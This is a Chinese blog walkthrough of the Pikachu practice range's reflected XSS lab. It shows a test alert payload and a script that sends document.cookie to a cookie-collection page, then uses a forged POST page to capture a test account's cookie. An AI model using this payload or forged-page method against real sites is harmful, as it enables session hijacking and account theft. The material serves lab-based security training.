pikachu靶场之反射型XSS(cookie盗取)

最新推荐文章于 2024-06-17 14:41:46 发布
最新推荐文章于 2024-06-17 14:41:46 发布
阅读量1.9k 收藏 12
点赞数 2
分类专栏: 靶场实践 文章标签: 信息安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45705209/article/details/108120108
版权

反射型XSS

尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。
利用漏洞获取cookie实例操作
这里我们用的例子是post型,get型利用容易被受害者察觉,因为get型只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/cookie.php?cookie=' + document.cookie; </script>类似脚本,而post型的话可以伪造一个界面,这样用户上当的概率更大。利用XSS漏洞获取cookie需要搭建一个cookie后台,这个靶场已经为我们建好了所以我们只需要初始化即可,在左侧功能栏的最下面有一个管理工具,进去XSS后台进行初始化。(一般初始化不了都是连接数据库配置文件的问题,只要修改pkxss/inc下的config.inc.php配置即可)
初始化XSS平台后登录等待cookie的到来就行
在这里插入图片描述

需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)。
在这里插入图片描述

接下来打开我们伪造的一个页面http://127.0.0.1/pkxss/xcookie/post.html(这个文件在XSS后台的xcookie目录下),在url中输入就会自动跳转到XSS反射型的post界面,然后我们输入靶场另一个测试账号test\abc123,登陆成功
在这里插入图片描述

在XSS后台的cookie搜集模块就可以看到受害者(test)的cookie记录(看不到的话需要再去访问一下这个伪造界面)。
在这里插入图片描述

硬核韦恩
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1164
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
XSS ———— (二)利用反射XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1116
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
pikachu靶场XSS漏洞通关
Zqinglele的博客
04-19 2031
存储是将攻击者在留言板等输入框中输入的恶意代码直接存入数据库中,由于数据库不识别js代码,一旦有用户打开存有恶意代码的网页界面,那么恶意代码就会被从数据库中读出,是一类危害最大的xss攻击。dom又称self-xss,攻击者利用dom节点的结构在网页中插入一段恶意代码,这段代码被简单处理或未处理后又在网页中的一个位置显示出来,攻击过程中所有恶意代码均在前端执行。在用户点击被攻击者插入恶意代码的网页链接后,恶意代码在被攻击者的网页中被执行。尝试插入payload,发现是有长度限制,不能把这句完整插入。
Pikachu漏洞靶场系列之XSS
weixin_45868644的博客
09-10 4924
文章目录概述跨站脚本漏洞常见类XSS漏洞的测试流程搭建XSS后台一、反射XSS(Get)实验案例-获取Cookie二、反射XSS(Post)三、存储XSS实验案例-钓鱼攻击实验案例-键盘记录什么是跨域跨域-同源策略为什么要同源策略四、DOMXSS五、DOMXSS-X六、XSS之盲打七、XSS之过滤转换的思路编码的思路XSS之htmlspecialcharsXSS常见防范措施XSS之href输出XSS之js输出总结XSS常见Payload 概述 1、XSS就是攻击者在web页面插入恶意的Scri
Pikachu靶场--XSS
最新发布
qq_65150735的博客
06-17 1136
Pikachu靶场--XSS跨站脚本
反射xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 4446
演示用靶场:dvwa
反射xss偷取cookie(本地验证)
think_ycx的专栏
11-14 3180
原理反射xss 为危害之一就是:用户在登录的情况下点击了黑客发送的链接,就会导致该网址的cookie泄露,导致帐号被黑客登录。
最简单的反射XSScookie
热门推荐
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射。其实就是最简单的一个反射cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞的
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1824
xss盗取cookie
pikachu靶场之Cross-Site Scripting(XSS
Christma1s的博客
03-06 527
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射XSS; 2.存储XSS; 3.DOMXSS; ...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
在"Pikachu靶场"中,用户通常会遇到各种网络安全挑战,包括但不限于Web应用漏洞挖掘(如SQL注入、XSS跨站脚本攻击、文件包含漏洞等)、网络服务漏洞利用(如FTP、SMTP、SSH等服务的漏洞)、密码学概念应用(如加密与...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1602
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
pikache靶场通关——XSS漏洞
p36273的博客
06-17 3294
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS反射XSS;存储XSS;DOMXSS;XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;输出转义:根据输出点的位置对输出到前端的内容进行适当转义;
xss收集cookie方法(以pikachu靶场举例)
weixin_59047731的博客
01-13 827
本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7472
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类及测试流程反射XSS(post&get)存储XSSDomXSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射XSS; 2.存储XSS;
pikachu靶场domxss
08-16
Pikachu靶场是一个用于漏洞测试的平台,而DOMXSS(跨站脚本攻击)是一种利用网页中的DOM(文档对象模)进行攻击的方式。在DOMXSS攻击中,攻击者通过注入恶意脚本来篡改网页的行为,使其执行攻击者预期的操作。 在Pikachu靶场中,你可以使用DOMXSS来测试网页应用程序的安全性。你可以尝试在输入框或其他用户可控制的区域注入一些恶意的脚本代码,然后观察应用程序的反应和是否存在漏洞。 需要注意的是,参与靶场活动时请确保遵守合法和道德规范,并获得合法的授权来进行测试。未经授权的攻击行为可能会违反法律,并对系统和用户造成损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值